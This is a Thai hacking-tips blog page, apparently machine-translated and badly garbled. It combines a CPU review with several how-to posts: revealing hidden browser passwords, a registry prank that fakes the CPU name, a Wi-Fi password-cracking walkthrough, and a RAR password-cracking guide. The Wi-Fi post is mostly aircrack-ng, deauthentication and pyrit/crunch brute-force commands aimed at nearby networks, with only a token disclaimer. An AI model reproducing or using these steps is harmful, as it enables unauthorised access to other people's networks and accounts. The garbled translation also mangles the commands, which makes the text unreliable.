วันจันทร์ที่ 10 กุมภาพันธ์ พ.ศ. 2557

PU ที่ดีที่สุด: 10 ด้านบนหน่วยประมวลผลการตรวจสอบและจัดอันดับ



CPU ที่ดีที่สุด: 10 ด้านบนหน่วยประมวลผลการตรวจสอบและจัดอันดับ

This is it, เด็กชายและเด็กหญิง เรากำลังใกล้จะถึงจุดสิ้นสุดของวันสำหรับการประมวลผลคอมพิวเตอร์ในขณะที่เรารู้ว่ามัน มีพายุของการเปลี่ยนแปลงบนขอบฟ้าและจะเป็นทุกคนคาดเดาสิ่งที่เครื่องคอมพิวเตอร์จะเป็นเช่นในแง่ฮาร์ดแวร์เมื่อมันพัดผ่าน

ตอนนี้สิ่งที่มีมากที่สุดเท่าที่พวกเขาได้รับเสมอ คุณจ่ายเงินของคุณคุณจะใช้เวลาที่คุณเลือก ในคำอื่น ๆ ที่คุณได้รับการเลือกซีพียูที่คุณต้องการและตรงกับเมนบอร์ดและกราฟิกการ์ด คุณมีตัวเลือกทั้งเอเอ็มดีและอินเทล และในหลายกรณีที่คุณได้ยังคงมีการควบคุมเต็มรูปแบบผ่านชิปที่คุณซื้อ คุณสามารถโอเวอร์คล็อกมัน underclock มันสลับออกและรับประทานอาหารโดยทั่วไปเกี่ยวกับมัน
ไว้วางใจเราเกี่ยวกับเรื่องนี้ - มากที่จะเริ่มต้นที่จะหายไปภายใน 18 เดือนข้างหน้าดังนั้นสนุกกับมันในขณะที่มันกินเวลา

เอเอ็มดี FX
หากคุณกำลังสงสัยว่าทำไมมีจำนวนของแนวโน้มในการทำงาน ประการแรกตำแหน่งเอเอ็มดีเป็นที่น่ากลัวสวย เราจะมาว่าในรายละเอียดเพิ่มเติมในภายหลัง แต่เอเอ็มดีอย่างแท้จริงโอนเอนอยู่บนขอบของการให้อภัย แล้วมีความคิดครอบงำของตลาดที่มีทุกสิ่งที่อัลตร้ามือถือและแนวโน้มทางเทคโนโลยีที่มีต่อการรวมคุณสมบัติมากขึ้นที่ entails
อย่างมากมันจะไม่นานก่อนที่คุณไม่สามารถซื้อที่ลดลงในซีพียู พวกเขาจะมาบัดกรีลงบนเมนบอร์ด ดังนั้นในขณะที่เราได้ข้อร้องเรียนบางอย่างเกี่ยวกับสถานะปัจจุบันของการเล่นในซีพียูมีโอกาสที่เราจะเร็วจะมองย้อนกลับไปเกี่ยวกับเรื่องนี้เป็นยุคทองในแง่ของทางเลือกและความยืดหยุ่นเป็น เพื่อให้ได้รับออกมีและมีความสุขมากในนั้นที่เราพูด

กราฟิกการ์ดที่ดีที่สุดในโลก

มีบางซีพียูที่ดีจากทั้ง AMD และ Intel ที่สามารถยังคงมีความสุขในแบบที่ชื่นชอบจริง พวกเขากำลังอย่างเต็มที่ลดลงในสามารถ พวกเขากำลัง tweakable พวกเขากำลังสนุก และวิธีการที่ตลาดซีพียูที่เป็นไปได้ที่พวกเขาอาจจะได้รับผลงานที่ทำได้เป็นเวลาอย่างน้อยสองสามปี
ในระหว่างการทำ CPU ต้อนนี้ก็รู้สึกเหมือนเราอยู่ในเวลาที่ยืม เครื่องคอมพิวเตอร์ที่อยู่ในช่วงเปลี่ยนผ่านและห้าปีนับจากตอนนี้มากของสิ่งที่คุณจะได้รับเมื่อคุณ spec ขึ้นที่แท่นขุดเจาะอาจจะหายไปหรือแตกต่างกันมาก
แนวโน้มต่ออัลตร้ามือถือและความล้มเหลวของเอเอ็มดีจริงๆติดกับอินเทลเมื่อสิ้นสุดการดำเนินงานของตลาดแม้ว่าจะผลิตชิปที่ดีสำหรับงบประมาณที่เข้มงวดมากมีสองคนขับรถที่สำคัญที่นี่มี
แต่ขอเริ่มต้นด้วยความบ้าคลั่งที่พิเศษมือถือ มันอธิบายเหตุผลทั้งหมดของการประมวลผลคอมพิวเตอร์ของอินเทลที่สำคัญตอนนี้มีกราฟิกบนตาย กับรุ่นของชิปคอมพิวเตอร์ใด ๆ ที่คุณได้รับปริมาณของทรานซิสเตอร์ที่มีอยู่ 'งบประมาณ' ทรานซิสเตอร์ที่เพิ่มขึ้นเมื่อเวลาผ่านไปเทคโนโลยีการผลิตที่ลดลงทรานซิสเตอร์แต่ละบุคคล
ในอดีตที่ผ่านมามันก็สวยมากใช้เวลาทั้งหมดในการปรับปรุงประสิทธิภาพการทำงานของซีพียู หน่วยงานที่ซับซ้อนมากขึ้นการทำงานของแคชมากขึ้นแกนมากขึ้น, เพิ่มคุณสมบัติที่จะช่วยให้แกนเช่นควบคุมหน่วยความจำในการตาย
อยู่แล้ว แต่เป็นกระบวนการที่มีการชะลอตัว ล่าสุดหน่วยประมวลผลของอินเทล Ivy Bridge เป็นตัวอย่างที่ดี ที่ประมาณ 1400000000 ทรานซิสเตอร์สำหรับรุ่น quad-core เช่น Core i5-3570K, Ivy Bridge เป็นอย่าง 240 ล้านทรานซิสเตอร์ขนาดใหญ่กว่าชิป quad-core Sandy Bridge มันถูกแทนที่ด้วย แต่ก็ไม่ได้มีแกนเพิ่มเติมหรือพิเศษ แคช เอาล่ะหน่วยปฏิบัติจะเอ็นดูเล็กน้อย แต่เรากำลังพูดถึงการปรับปรุงหลักเดียวมักจะต่ำในการทำงานต่อเนื่อง นั่นคือไม่มากที่จะแสดงการเพิ่มขึ้นของร้อยละ 20 ในความซับซ้อน
คำอธิบายเหตุผลของหลักสูตรคือการที่อินเทลทิ้งเกือบทุกคนทรานซิสเตอร์ 200 ล้านแปลกที่แกนกราฟิกของ Ivy Bridge สิ่งเดียวที่จะนำไปใช้ในปีต่อไปเมื่อชิปแฮสใหม่เข้ามา พวกเขาจะยังคงเป็นสัตว์สี่หลักที่ดีที่สุดและมากที่สุดจากการเพิ่มขึ้นในการนับทรานซิสเตอร์จะถูกเป่าในการปรับปรุงกราฟิกรวม
X79 ที่เมนบอร์ด
ปัญหาคือว่า, วันที่, กราฟิกโปรเซสเซอร์ของอินเทลในการตายยังไม่ได้รับการเล่นเกมที่คุ้มค่า ในบริบทเครื่องคอมพิวเตอร์มือถือที่มีประสิทธิภาพการใช้พลังงานแบบบูรณาการเป็นที่ดี แต่บนเดสก์ทอปและถ้าคุณเป็นเกมมันเป็นซิลิกอนที่ตายแล้ว เลวร้ายยิ่งกว่านั้นก็หมายความว่าอินเทลสูญเสียประสิทธิภาพการประมวลผล - ผลการดำเนินงานที่คุณจริงจะใช้ - ในความโปรดปรานของการปรับปรุงประสิทธิภาพของกราฟิกแบบบูรณาการที่คุณจะไม่ใช้จากอึเพียงปานกลาง
ในที่สุดกราฟิกโปรเซสเซอร์ของอินเทลจะมาที่ดีสำหรับการเล่นเกม แต่เราก็ยังคงเป็นเวลาหลายปีออกไปจากที่เกิดขึ้นว่า อย่างไรก็ตามทั้งหมดนี้เป็นเพราะคอมพิวเตอร์มือถือคือการขับรถการออกแบบซีพียู ที่จริงที่ไม่ได้ทั้งหมดกรณี - ก็ยังเพราะเอเอ็มดียังไม่ได้ก้าวขึ้นไปบนจาน
เอเอ็มดีไม่สามารถแข่งขันกับการดำเนินงานที่แท้จริงของวัตถุดิบที่เร็วที่สุดในปัจจุบันชิปสี่คอร์ของอินเทลในซ็อกเก็ต LGA1155 และนั่นหมายความว่ามันไม่มีที่ไหนเลยใกล้ชิประดับสูงของอินเทลในซ็อกเก็ต LGA2011 ชิป LGA2011 แน่นอนไม่ได้มีกราฟิกโปรเซสเซอร์และจะเน้นทั้งในประสิทธิภาพการทำงานของซีพียู แต่ไม่มีการรักษาเอเอ็มดีอินเทลซื่อสัตย์ชิป LGA2011 จะ hobbled จงใจและมีราคาแพงมาก
วางวิธีนี้หากเอเอ็มดีมีซีพียูแข่งขัน LGA2011 ซีพียูของอินเทลหกหลักอาจจะเป็นครึ่งหนึ่งของราคาที่พวกเขามีวันนี้และมียังจะแปดแกนด้านบน วางไว้ด้วยกันและหลีกเลี่ยงไม่ได้ข้อสรุปปฏิเสธไม่ได้ก็คือซีพียูเดสก์ทอปของอินเทลที่มีอยู่แล้วไม่มีอะไรเหมือนสิ่งที่พวกเขาจะถ้า Intel เป็นเพียงมุ่งเน้นไปที่ประสิทธิภาพการทำงานของ
แต่สิ่งที่เอเอ็มดี? ดีที่เป็นปัญหาที่แตกต่างกันอย่างสิ้นเชิง และมันคือทั้งหมดที่จะทำอย่างไรกับการดำเนิน ใส่เพียงทุกอย่างเอเอ็มดีได้เปิดตัวในที่ผ่านมาห้าปีได้รับสายเกินไปและช้าเกินไป นั่นคือสงสารมากเพราะเอเอ็มดีมีแนวโน้มที่จะขายซีพียูตรงไปตรงมาในการกำหนดค่าที่ผู้ที่ชื่นชอบพีซีต้องการ Plus ถ้าซีพียูที่มีการแข่งขันมากขึ้น Intel แน่นอนจะถูกบังคับให้ทำในสิ่งที่แตกต่างกันเกินไป

ด้านสว่าง

Intel CPU

ในขั้นตอนนี้เราได้วาดภาพที่เยือกเย็นสวยของรัฐของหน่วยประมวลผลคอมพิวเตอร์แต่จริงๆแล้วสิ่งที่ยังคงเป็นสิ่งที่ดีงาม คุณยังสามารถซื้อซีพียูแยกและผสมและตรงกับพวกเขากับเมนบอร์ดและกราฟิกการ์ดที่ช่วยให้คุณได้รับความสมดุลของผลการดำเนินงานเพียงเพื่อให้
และชิปเอเอ็มดียังคงมีการแข่งขันที่จุดราคาบางอย่างที่มีผลเคาะในตลาดทั่ว ขึ้นไปยังจุดในขณะที่มันประสิทธิภาพ CPU แนวโน้มที่จะยิ่งสูงขึ้นหากเอเอ็มดีได้เล่นเกมที่ดีกว่าในปีที่ผ่านมาของหลักสูตรการประมวลผลของวันนี้ยังคงมีบิตที่มีประสิทธิภาพมากของชุด Intel อาจไม่ได้เพิ่มจริงกับชิปแกนหลักของมัน แต่ก็มีการดำเนินงานที่ดีมากในการปรับปรุงประสิทธิภาพการทำงานต่อหลัก
Sandy Bridge เป็นขั้นตอนมากไปข้างหน้าในเรื่องที่และล่าสุดโปรเซสเซอร์ Ivy Bridge ยกเกมเล็กน้อยต่อไป ทั้งหมดซึ่งหมายความว่าเหล่านี้จะยังคงเป็นเวลาที่ดีในตอนนี้ ห้าปีต่อจากนี้มันเป็นเรื่องยากที่จะพูด แต่ก็มีแนวโน้มอย่างมากที่คุณจะมีทางเลือกน้อยมากและปีต่อปี CPU เพิ่มประสิทธิภาพการทำงานอาจจะมีการชะลอตัวที่จะหยด - เอเอ็มดีอาจจะ Goner ตัวอย่างเช่นและก็ โอกาสที่คุณจะไม่สามารถที่จะซื้อยืนอยู่คนเดียว CPU และวางลงในเมนบอร์ดที่คุณเลือก ไม่กี่ปีหลังจากนั้นคุณอาจจะต้องกลืนเมนบอร์ดซีพียูและกราฟิกในหนึ่งเม็ดใหญ่
ย้อนกลับไปในที่นี่และตอนนี้แม้ว่าเราจะสนุกกับสิ่งที่อยู่ในข้อเสนอ หากคุณกำลังเล่นเกมบ้าเช่นเราข่าวดีก็คือว่าคุณไม่จำเป็นต้องไปทางขวาไปด้านบนของรายการปัจจุบันของอินเทลที่จะได้รับประสิทธิภาพที่ดี คณะสี่คนกระแสหลักของอินเทลยังคงดีอุกอาจสำหรับผู้ที่อยู่ในงบประมาณที่เข้มงวดมากที่มีตัวเลือกที่น่าสนใจมากบางบางส่วนที่มาจากเอเอ็มดี
หากคุณมีตันของเงินสดแน่นอนมีตัวเลือกมากขึ้น ในความเป็นจริงที่เราได้โยนชิป Intel Xeon เข้าผสมเพื่อแสดงให้เห็นว่าสิ่งที่ทั้งสองอาจจะได้รับในช่วงปลายสูงและยังเป็นวิธีที่คุณจะได้รับรอบของอินเทลแนวโน้มที่เพิ่มขึ้นที่จะกระสอบทราย
นอกจากนี้ยังเป็นที่น่าสังเกตว่าจากประสิทธิภาพของเครื่องคอมพิวเตอร์และผู้ที่ชื่นชอบการเล่นเกมมุมมองตอนนี้เป็นเวลาที่ดีที่จะซื้อจริงๆ ปีถัดไปชิปแฮสจากอินเทลเป็นอย่างสูงที่ไม่น่าจะนำมาซึ่งการเพิ่มขึ้นอย่างมากในประสิทธิภาพการทำงานของซีพียู ทางด้านเอเอ็มดีที่เราหวังที่จะเห็น บริษัท จริงๆเพิ่มเกมของปีถัดไป แต่ตอนนี้ที่กำลังมองหาโอกาสก่อนที่ 2014 ถ้าเคย
ดังนั้นมันยุติธรรมที่จะบอกว่าดี CPU ซื้อวันนี้จะยังคงมีการแข่งขันเป็นเวลาหลายปีที่ผ่านมา ขณะที่อาร์นีกล่าวว่าจากนั้นทำมัน ทำตอนนี้

วิธีที่ง่ายที่จะเห็นรหัสผ่านที่อยู่เบื้องหลังเครื่องหมายดอกจัน



ทั้งหมดที่คุณต้องทำคือการไฮไลต์และคลิกขวาที่ฟิลด์รหัสผ่านของหน้าเป้าหมายและคลิก ["ตรวจสอบองค์ประกอบ"] บางสิ่งบางอย่างเช่น Facebook, นี่เป็นวิธีที่มันจะมีลักษณะ
Code:[[input type="password" class="inputtext" name="pass" id="pass" tabindex="2"]]

Now change the type="password" to type="text" Spoiler
และมีคุณมีมัน แต่น่าเสียดายที่ผมไม่สามารถแสดงรหัสผ่านที่ถูกเปิดเผยในเวลาจริงตั้งแต่พวกเขาเป็นภาพเพียง แต่คุณสามารถทดสอบมันออกมาในเรื่องของการวินาทีและเห็นมันทำงาน ผมได้ทดสอบนี้กับ Yahoo, Gmail, YouTube และ Facebook เพื่อฉันแน่ใจว่ามันทำงานร่วมกับเว็บไซต์อื่น ๆ ได้เป็นอย่างดี ทดสอบกับ Firefox และ Chrome http://GhostHx.blogspot.com/ # Ghost Hx

วิธีการเปลี่ยนชื่อหน่วยประมวลผลอย่างถาวรที่จะหลอกเพื่อนของคุณ



คุณต้องการที่จะแสดงให้เห็นแบรนด์โปรเซสเซอร์ใหม่ซึ่งอาจจะไม่ได้รับการตีพิมพ์แม้ในตลาด ใช่แน่นอนคุณจะชอบมัน ด้วยเคล็ดลับนี้คุณสามารถเปลี่ยนชื่อของตัวประมวลผลของคุณให้เป็นหนึ่งในบุคคลเช่น I12 Intel หรือบางสิ่งบางอย่างมากเช่นเอเอ็มดีเรดอน 30 GHz เพื่อให้ปฏิบัติตามขั้นตอนที่กำหนด

วิธีการเปลี่ยนชื่อหน่วยประมวลผล permanantly
 1 เปิด Notepad คัดลอกและวางโค้ดด้านล่างลงในไฟล์

ของ Windows Registry Editor เวอร์ชั่น แกน (TM) I12-3470 CPU@32.5GHz "

เปลี่ยนข้อความสีสีฟ้าที่มีสิ่งที่คุณต้องการที่จะแสดงเป็นชื่อของตัวประมวลผล

วิธีการเปลี่ยนชื่อหน่วยประมวลผล permanantly

2 บันทึกไฟล์ด้วยเร็ก. ขยายเช่น " anyname.reg "

วิธีการเปลี่ยนชื่อหน่วยประมวลผล permanantly

3 ดับเบิลคลิกที่ไฟล์ คุณจะได้รับสองรวดเร็วเพียงแค่ช่วยให้พวกเขาในการติดตั้งรีจิสทรีคีย์

วิธีการเปลี่ยนชื่อหน่วยประมวลผล permanantly

4 ขณะนี้ตรวจสอบว่าชื่อที่ได้รับมอบหมายให้เป็นหน่วยประมวลผล กด " ของ Windows + Pause / หยุด"เพื่อเปิดคอมพิวเตอร์ของฉันคุณสมบัติหรือคลิกขวาบนคอมพิวเตอร์ของฉันและเลือก"Properties"


5 คุณควรจะได้รับชื่อหน่วยประมวลผลที่คุณได้รับมอบหมายให้มีคีย์รีจิสทรี

วิธีการเปลี่ยนชื่อหน่วยประมวลผล permanantly

นี้ก็เพียงพอสำหรับหนึ่งในเซสชั่น, แต่ปัญหาคือว่าชื่อของตัวประมวลผลกลับไปเริ่มต้นหลังจากที่ผู้ใช้รีสตาร์ทเครื่องคอมพิวเตอร์ของเขา วิธีแก้ปัญหานี้คือการวางไฟล์ในโฟลเดอร์เริ่มต้นขึ้นดังนั้นเมื่อใดก็ตามที่ระบบจะบูตคีย์รีจิสทรีจะได้รับการติดตั้งจะ

6 คัดลอกหรือตัดไฟล์รีจิสทรีที่สร้างขึ้นเหนือและวางไว้ในไดเรกทอรีC: \ Documents and Settings \ ผู้ใช้ทั้งหมด \ Start Menu \ Programs \ Startup (ใน Windows XP) หรือC: \ Users \ ชื่อผู้ใช้ \ AppData \ Roaming \ Microsoft \ Windows \ เมนูเริ่ม \ Programs \ Startup (ใน Windows 8, Windows 7 และ Windows Vista) แทนที่ผู้ใช้ชื่อกับรหัสผู้ใช้ปัจจุบันของผู้ใช้
วิธีการเปลี่ยนชื่อหน่วยประมวลผล permanantly

7 ทำตอนนี้ตรวจสอบว่าการทำงานหรือไม่


รหัสผ่านสับ WIFI กับ BACKTRACK 5

คำเตือน: อย่าสับเราเตอร์ที่ได้รับอนุญาตใด ๆ มิฉะนั้นคุณจะได้รับการใส่ลงไปในคุก เพียงเพื่อการศึกษาเท่านั้น .. ผมไม่รับผิดชอบต่อสิ่งที่คุณทำใด ๆ !


บางสิ่งที่จะตามมา .. เช่นการสร้างเครื่องเสมือน! ทำงานในระบบปฏิบัติการของคุณถ้าคุณมีหน้าต่าง .. !!
ดาวน์โหลด VMware เวิร์กสเตชันที่นี่ : http://www.softpedia.com/get/System/OS-Enhancements/VMware-Workstation.shtml
สร้างเครื่องเสมือนใหม่เช่นผมได้สร้าง ... !

กดป้อน ...... ไป


ที่ BOOT เมนู .... เพียงพิมพ์ startx


ขณะนี้การตั้งค่าทั้งหมดของคุณที่จะไป ... เพียงแค่เพียงทำตามขั้นตอนด้านล่างนี้ ...


กฎการปฏิบัติ


  • ซีดี Backtrack สด: ลินุกซ์สดซีดีที่ช่วยให้คุณทำทุกประเภทของการทดสอบการรักษาความปลอดภัยและงาน ดาวน์โหลดสำเนาของตัวเองซีดีและเผามันหรือโหลดขึ้นใน VMware ในการเริ่มต้น
  • ที่นี่เชื่อมโยงไปยังดาวน์โหลดได้http://www.backtrack-linux.org/downloads
  • ผมขอแนะนำให้คุณดาวน์โหลด backtrck 32 บิตรุ่น coz มันทำงานได้อย่างราบรื่น ... ใน win7 64bit ผ่านเวิร์กสเตชัน vmware .......... /
  • WEP เปิดใช้งานเครือข่ายไร้สายในบริเวณใกล้เคียง
  • ความอดทนกับบรรทัดคำสั่งนี้เป็นกระบวนการที่สิบขั้นตอนที่ต้องใช้ในการพิมพ์นานคำสั่งลับและรอรอบสำหรับบัตร Wi-Fi ของคุณในการเก็บข้อมูลเพื่อที่จะ crack รหัสผ่าน เช่นแพทย์กล่าวไปยังบุคคลที่ระยะสั้นจะเป็นผู้ป่วยน้อย


    ขั้นตอนในการปฏิบัติตาม:
    ขั้นที่ 1: 

    airmon-ng

    ผลจะเป็นสิ่งที่ชอบ

    การเชื่อมต่อไดร์เวอร์ชิปเซ็ต
    Intel wlan0 5100 iwlagn - [phy0] 


    ขั้นที่ 2: 

    airmon-ng เริ่ม wlan0 

    ขั้นที่ 3 (อุปกรณ์เสริม):

    การเปลี่ยนแปลงที่อยู่ MAC ของอินเตอร์เฟซ mon0 

    ifconfig mon0 ลง
    macchanger เมตร 00:11:22:33:44:55 mon0 
    ifconfig mon0 ขึ้น

    ขั้นที่ 4: 

    airodump-ng mon0

    แล้วกด " Ctrl + C "ที่จะทำลายโปรแกรมขั้นที่ 5: 



    airodump-ng c-3-W wpacrack - ff BSSID: ff: ff: ff: ff: ff - ivs mon0

    *-C ที่เป็นช่อง
    -W เป็นไฟล์ที่จะเขียน
    - BSSID เป็น BSSID ขั้วนี้จะทำให้การทำงานขั้นตอนที่ 6:เปิดอีก สถานี







    aireplay-ng -0 1-ff: ff: ff: ff: ff: ff-C 99:88:77:66:55:44 mon0

    *-ที่เป็น BSSID 
    -C เป็นลูกค้าอยู่ MAC ( สถานี) รอการจับมือกันขั้นที่ 7:ใช้จอห์นเดอะริปเปอร์เป็นรายการคำที่จะแตกรหัสผ่าน WPA/WP2 







    aircrack-ng-w / pentest / รหัสผ่าน / จอห์น / password.lst wpacrack-01.ivs

    ขั้นที่ 8 (อุปกรณ์เสริม ): ITS ขั้นตอนตัวเลือก,,,,,,

    หากคุณไม่ต้องการที่จะใช้จอห์นเดอะริปเปอร์เป็นรายการคำคุณสามารถใช้เสียงดังไปที่เว็บไซต์อย่างเป็นทางการของกระทืบ


    http://sourceforge.net/projects/crunch -wordlist/files/crunch-wordlist /

    ดาวน์โหลดกระทืบ 3.0 (รุ่นปัจจุบันในเวลานี้ 


    -xvzf กระทืบ 3.0.tgz 
    กระทืบ cd-3.0 
    แต่งหน้า
    ให้ติดตั้ง

    / pentest / รหัสผ่าน / กระทืบ / กระทืบ 8 16-F / pentest / รหัสผ่าน / กระทืบ / charset.lst mixalpha ตัวเลขทุกพื้นที่-sv | wpacrack aircrack-ng -01.ivs-b ff: ff: ff: ff: ff: ff-W - 

    * ที่8 16คือความยาวของรหัสผ่านคือจาก 8 ตัวอักษร 16 ตัวอักษร(B) nVidia การ์ดแสดงผลที่มี CUDAหากคุณมี การ์ด nVidia กับ CUDA คุณสามารถใช้ pyrit จะแตกรหัสผ่านที่มีการกระทืบขั้นตอน: 







    airmon-ng

    ผลจะเป็นสิ่งที่ชอบ

    การเชื่อมต่อไดร์เวอร์ชิปเซ็ต
    Intel wlan0 5100 iwlagn - [phy0] 


    ขั้นตอน b: 

    airmon-ng wlan0 เริ่ม

    ขั้นตอนที่ ค (อุปกรณ์เสริม):

    การเปลี่ยนแปลงที่อยู่ MAC ของอินเตอร์เฟซ mon0 

    ifconfig mon0 ลง
    macchanger เมตร 00:11:22:33:44:55 mon0 
    ifconfig mon0 ขึ้น

    ขั้นตอนที่ d: 

    airodump-ng mon0

    แล้วกด " Ctrl + C " ที่จะทำลายโปรแกรมขั้นตอนที่อีเมล: 



    airodump-ng c-3-W wpacrack - BSSID ff: ff: ff: ff: ff: ff mon0 

    ขั้นตอนที่ f:

    เปิดอีกขั้ว

    aireplay-ng -0 1-ff: ff : ff: ff: ff: ff-C 99:88:77:66:55:44 mon0

    *-ที่เป็น BSSID 
    -C เป็นลูกค้าที่อยู่ MAC (สถานี) รอการจับมือกันขั้นกรัมหากต่อไปนี้ โปรแกรมที่ไม่ได้ติดตั้งโปรดทำมัน







    apt-get ติดตั้ง libghc6-zlib-dev libssl-dev หลาม dev-libpcap dev-หลาม-Scapy 

    ขั้นตอนที่ h:

    ไปที่เว็บไซต์อย่างเป็นทางการของกระทืบ
    http://sourceforge.net/ โครงการ / กระทืบ WordList ที่ไฟล์ / / กระทืบ WordList ที่ /

    ดาวน์โหลดกระทืบ 3.0 (รุ่นปัจจุบันในเวลานี้ 


    -xvzf กระทืบ 3.0.tgz 
    กระทืบ cd-3.0 
    แต่งหน้า
    ให้ติดตั้ง

    ขั้นตอนที่ฉัน:

    ไปที่เว็บไซต์อย่างเป็นทางการของ pyrit 

    http://code.google.com/p/pyrit/downloads/list

    ดาวน์โหลดpyritและcpyrit-CUDA ( รุ่นปัจจุบันเป็น 0.4.0 ในขณะที่เขียนนี้) 

    tar-xzvf pyrit-0.4.0.tar.gz 
    cd pyrit-0.4.0 
    หลาม setup.py สร้าง
    sudo หลาม setup.py ติดตั้ง

    tar-xzvf cpyrit-CUDA- 0.4.0.tar.gz 
    cd-cpyrit CUDA-0.4.0 
    หลาม setup.py สร้าง
    sudo หลาม setup.py ติดตั้ง

    ขั้นตอนที่เจ: 

    / pentest / รหัสผ่าน / กระทืบ / กระทืบ 8 16-F / pentest / รหัสผ่าน / กระทืบ / charset LST mixalpha ตัวเลขทุกพื้นที่-sv | pyrit - ทั้งหมด handshakes-r-wpacrack-01.cap-b ff: ff: ff: ff: ff: ff-i - attack_passthrough

    * ที่8 16คือความยาวของ รหัสผ่านคือจาก 8 ตัวอักษร 16 ตัวอักษรขั้นตอนที่ k (อุปกรณ์เสริม):หากคุณพบข้อผิดพลาดเมื่ออ่าน



    wpacrack-01.capคุณควรทำขั้นตอนต่อไปนี้

    pyrit-r-wpacrack 01.cap-o new.cap stripLive 

    / pentest / รหัสผ่าน / กระทืบ / กระทืบ 8 16-F / pentest / รหัสผ่าน / กระทืบ / charset.lst mixalpha ตัวเลขทุกพื้นที่-sv | pyrit - ทั้งหมด handshakes-r-new.cap-b ff: ff: ff : ff: ff: ff-i - attack_passthrough

    * ที่8 16คือความยาวของรหัสผ่านคือจาก 8 ตัวอักษร 16 ตัวอักษรขั้นตอนต่อลิตร:แล้วคุณจะเห็นสิ่งที่คล้ายกับต่อไปนี้





    Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com 
    รหัสนี้มีการกระจายภายใต้สัญญาอนุญาต v3 GNU General Public + 

    ไฟล์วจีวิภาค 'new.cap' (1/1) ... 
    แจง 71 แพ็คเก็ต (71 802.11 แพ็คเก็ต) ได้ 55 AP (s) 

    พยายาม 17960898 PMKs จนถึง 17504 PMKs ต่อวินาที

    หมายเหตุ:

    หากคุณมี nVidia GeForce GTX460 (336 แกน CUDA), ความเร็วของการแตกประมาณ 17,000 รหัสผ่านต่อวินาทีในการทดสอบว่าบัตรไร้สายของคุณ ( ทั้ง USB หรือ PCI-e) สามารถทำฉีดหรือไม่



    airodump-ng mon0
    เปิดอีกขั้ว
    mon0 aireplay-ng -9
    ตรวจสอบให้แน่ใจ pyrit สามารถทำงานได้ในระบบของคุณ: 

    list_cores pyrit

    นั่นคือทั้งหมดที่! เห็นคุณขอขอบคุณคุณและ plz ตามฉันในบล็อก .............

    วันอาทิตย์ที่ 9 กุมภาพันธ์ พ.ศ. 2557

    ►วิธีการ crack รหัสผ่านของไฟล์ RAR!

    สวัสดีคนทราบวิธีการ crack รหัสผ่านของไฟล์ RAR ป้องกัน! เพื่อช่วยให้เริ่มต้นด้วยสิ่งนี้ ... !►วิธีการ crack รหัสผ่านของไฟล์ RAR! เคล็ดลับ►: คู่มือนี้จะแนะนำคุณวิธีที่ง่ายที่สุดที่จะใช้ RAR Password Recovery 5.0 [ลิงค์ดาวน์โหลดของ RAR กู้คืนรหัสผ่าน คัดลอกและวาง DOWNLOAD! = รายละเอียดข้อมูลที่มีอยู่ใน "Help" แฟ้มรวมอยู่ในโปรแกรมโปรดดูที่ถ้าข้อสงสัยใด ๆ ►ขั้นตอนที่ 1 นำเข้าล็อคไฟล์ RAR ดาวน์โหลด SmartKey RAR Password Recovery และติดตั้งในคอมพิวเตอร์ที่ใช้สามารถใช้ได้ เริ่มต้นโปรแกรม ในอินเตอร์เฟซหลักให้คลิกปุ่ม "Open" เพื่อนำเข้าล็อคหรือ WinRAR ไฟล์ RAR(เอสเอสของขั้นตอน 1) เลือก WinRAR / RAR ไฟล์ของคุณในหน้าต่างเปิดไฟล์และคลิก "เปิด"ขั้นที่ 2 ► เลือกชนิดการโจมตีและกำหนดตั้งค่าการโจมตีแต่ละที่ "กู้" แท็บการเลือกโจมตีที่จะกู้คืนรหัสผ่าน RAR สูญหายหรือลืมการตั้งค่าและกำหนดโจมตีแต่ละ (หมายเหตุ:. มี 3 โจมตีสำหรับคุณเท่าที่เห็นด้านล่าง) (เอสเอสของขั้นตอนที่ 2) หลังจากการโจมตีประเภทที่เลือกแล้วคุณต้องตั้งค่าการตั้งค่าการโจมตีตาม สำหรับการโจมตีแต่ละการตั้งค่าหรือชุดมีความแตกต่างที่เห็นดังนี้→ตัวเลือก 1: หากคุณเลือกโจมตีกำลังถูกโปรแกรมจะลองผสมเป็นไปได้ทั้งหมดโดยเริ่มต้นจึงไม่จำเป็นต้องตั้งค่าใด ๆ กำหนด→ตัวเลือก 2 ไม่มี: ถ้าคุณ เลือกกำลังถูกโจมตีด้วยหน้ากากแล้วคุณต้องคลิก "กำลังถูก" บนทาสก์บาร์ กรุณาระบุการตั้งค่าด้วยตัวเองตามเบาะแสที่เป็นไปได้เกี่ยวกับรหัสผ่านที่คุณจำได้ของมันจะลดระยะเวลาของคุณมีความยาวรหัสผ่านเป็นตัวพิมพ์ใหญ่พิมพ์เล็กสัญลักษณ์คำนำหน้าและคำต่อท้าย ตัวอย่างเช่นถ้าคุณรู้ว่ารหัสผ่าน RAR ที่หายไปมี 1-6 ตัวซึ่งประกอบด้วยตัวพิมพ์เล็กและตัวเลขแล้วคุณสามารถตั้งค่าตัวเลือกเช่นนี้: 1 ตั้งค่าต่ำสุดความยาว = "1" และแม็กซ์ยาว = "6" 2 ตรวจสอบกล่อง az, 0-9 กล่อง(เอสเอสของ OPTOION 2) →ตัวเลือก 3: ถ้าคุณมีการบันทึกรหัสผ่านเบาะแสบางอย่างก่อนที่ คุณสามารถเลือกพจนานุกรมโจมตีมันจะพยายามรหัสผ่านทั้งหมดที่คุณสามารถภาพหนึ่งโดยหนึ่งและพบขวาหนึ่ง(เอสเอสของตัวเลือก 3) ►ขั้นที่ 3 การกู้คืนคลิกปุ่ม "Start" ในเมนูเริ่มต้นเพื่อเริ่มต้นโปรแกรม โปรแกรมจะเริ่มต้นที่จะแตกรหัสผ่าน กระบวนการแตกทั้งหมดจะใช้เวลาไม่กี่นาที เมื่อคุณประสบความสำเร็จในการค้นหารหัสผ่านกล่องข้อความจะปรากฏขึ้นอยู่กับคุณด้วยรหัสผ่านที่คาดว่าจะมีการแสดง คลิกที่ "คัดลอก" หรือวาง (CTRL + V) จากนั้นใช้รหัสผ่านเพื่อเปิดล็อค RAR หรือ WinRAR เก็บ ตอบโดยอ้างข้อความ(รหัสผ่านแตก) ►หวังว่าคุณจะมีความสุขและขอขอบคุณสำหรับการอ่าน! สำหรับการสอบถามแสดงความคิดเห็นด้านล่างและติดตามความคืบหน้าด้วย‪ # Ghost Hx ‬เยี่ยมชม http://Ghost Hx.blogspot.com

    6 วิธีการแคร็กรหัสผ่านที่พบบ่อยที่สุด By.Ghost Hx


    6 วิธีการที่ใช้ในการ crack รหัสผ่าน
